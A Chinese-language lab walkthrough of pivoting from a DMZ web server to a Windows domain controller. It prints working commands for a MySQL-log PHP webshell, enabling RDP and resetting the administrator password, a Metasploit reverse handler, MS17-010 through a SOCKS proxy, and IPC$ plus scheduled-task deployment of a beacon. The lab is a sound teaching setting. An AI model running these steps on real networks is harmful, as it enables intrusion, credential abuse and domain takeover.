内网渗透（DMZ---＞DC)

内网入门靶场练习

一：内网渗透

1、渗透流程

从DZM区域中的WEB Server（win7)进行渗透、DMZ和办公区域（Win2k3)有一定联系、将DMZ中的计算机当作跳板，利用隧道技术连接到内网办公区（Win2k3)，然后办公区和CD有一定的联系、这样我们就可以攻入内网拿下
DC

2、网络拓扑图

2-1 设备配置

攻击者：windows11一台 、 kali 一台
DMZ区域：web服务win7一台、Mail服务win7一台
内网区域：内网办公区win2003一台、DC win2008服务器一台

2-2 网络配置

外网IP段—>NAT----->192.168.64.0
内网IP段—>VM4----->192.168.111.0

二：环境配置

1、域环境配置

windows Server2008配置为CD，将win7-1 、win7-2和win2003加入域中！

2、网络配置

2-1 DMZ区-win7-1

（1）win7作为DMZ区域中的web服务器；需要双网卡（外网可以通过公网IP访问web服务，wi7可以通内网ip与内网进行交互）；当然我我为了方便直接将公网配置为了NAT、也可自行设置公网网段

外网IP段--->VM3----->192.168.52.0
内网IP段--->NAT----->(自动分配)

（2）配置静态IP

（3）配置公网IP

2-2 DMZ区-win7-2

(1)和win7-1类似只需要分配内网IP就行

2-3 内网办公区

（1）配置网卡为vm3（内网），配置内网ip 192.168.52.141

2-4 DC配置

（1）配置内网IP 192.168.52.138

2-5 攻击机

（1）由于公网网段设置的是NAT，所以不必配置，如果自己设置了公网网段、那么攻击机kali和windows就需要设置双网卡，设置双网卡的目的就是kali可以和DMZ中web服务的公网IP可以访问。

三：内网渗透

1、web服务器渗透

也就是我们平常看到的网页；首先就是进行信息收集；然后漏洞扫描、漏洞挖掘、漏洞利用、获取权限、权限提升等；最终的目的就是那先win7然后进一步进行内网渗透！

1-1 端口扫描

nmap扫描发现开启了80端口和3306端口（也就是数据库端口）

访问一下80端口出现php探针网址：php探针就是探测服务器配置的；发现并没有什么可以利用的

1-2 目录扫描

扫描出了数据库的后台登录网址和beifen.rar 文件；尝试数据库的弱口令爆破

爆破出了账号和密码 root/root

1-3 phpmyadmin写shell

写shell条件

绝对路径已知
网站权限为root
secure_priv_file= 为非 NULL 的空值

参考连接:https://blog.youkuaiyun.com/weixin_46365325/article/details/140555451
（4）日志写入shell

general_log 默认关闭，开启它可以记录用户输入的每条命令，会把其保存在对应的日志文件中。可以尝试自定义日志文件，并向日志文件里面写入内容的话

SHOW VARIABLES LIKE 'general%';
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/l.php';
select '<?php eval($_POST[1]); ?>';

1-4 webshell连接

1-4 远控拿下桌面

（1）查看ip :我们成功得到了服务器的内网ip ，此时我们是没有办法访问内网的，需要利用web服务当作跳板渗透内网

（2）开启3389服务

#开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#通过net user知道用户未administrator；但是不知道密码，直接修改
net user administrator admin@123  #更改密码
net user administrator /active:yes #激活密码

（3）连接

2、内网渗透拿下域内主机

拿下web应用服务器也就是DMZ的计算机；接下来就是利用这台主机当作跳板内网渗透拿下域内主机（内网办公主机window2003)

2-1 内网渗透

（1）域内信息收集以及存活探测；可以知道域名、存活主机以及CD

2-2 CS、MSF联动后渗透

（1）CS上线MDZ区的web服务器

上传木马

运行CS上线

（3）权限共享
将cs拿到的权限共享MSF,msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.xxx.xxx
set lport 9999
exploit/run

CS共享权限

pawn 发送到msf（将win7的shell共享给msf）

2-3 搭建隧道

（1）CS搭建sockets隧道（当然有很多方法）

（2）查看隧道信息

2-4 MSF利用隧道渗透

（1）隧道技术后直接拿下域内主机（域内主机存在永痕之蓝漏洞）

#返回
background
setg Proxies socks4:192.168.xxx.xxx:20808
search ms17_010
use 19
#设置域内主机Ip
set rhosts 192.168.52.141
run 

#payload
set command ipconfig

3、域环境渗透拿下DC

3-1 信息收集

（1）通过上述的信息收集和存活主机探测：知道域是god.org ，域控的名称为owa，DC的内网IP是192.168.52.138
（2）本地用户和域用户的区别
本地用户就是本地登录、账号和密码存放在本机；域用户就是加入域的用户，账号和密码由DC统一管理和分配
（3）域用户的判断

net time /domain

• 存在域，当前用户是域用户
• 存在域，当前用户是本地用户—>回显系统错误
• 不存在域—>回显找不到DC

3-2 CS上线DC（不出网）

（1）生成一个监听器

（2）生成木马

（3）现在出现一个问题，木马怎么上传到DC中呢，我们可以利用CS抓取密码；然后和DC之间建立IPC进程通信

• 抓取密码
  

• 建立IPC通信（现在wen服务器和DC已经建立安全信任关系了，直接上传木马）

#建立连接
shell net use \\192.168.52.138\ipc$ "password" /user:god\administrator
#查看连接
shell net use

• 文件上传

上传到web服务器中,然后利用web服务器上传到到DC中

• 上传到DC中，然后创建定时任务

#将木马从win7上传DC
shell copy beacon.exe \\192.168.52.138\c$
#设置计划任务
shell schtasks /create /s 192.168.52.138 /tn test /sc onstart /tr c:\beacon.exe /ru system /f
#运行计划任务test
shell schtasks /run /s 192.168.52.138 /i /tn "test"
#建立连接
connect 192.168.52.138
link 192.168.52.138

3-3 拿下DC

（1）CS成功上线

（2）查看ip

3-4 横向移动

（1）就做一个简单演示、当然方法很多；横向移动连接域内主机

上线域内主机win 2003（结束！！！）

四：渗透总结

1、总结

本次内网渗透是很简单的、都是存在漏洞的、在实战中可能拿下DMZ区域都是肯困难的，希望感兴趣的的可以深入学习内网渗透、不借助工具可以拿下DC！！！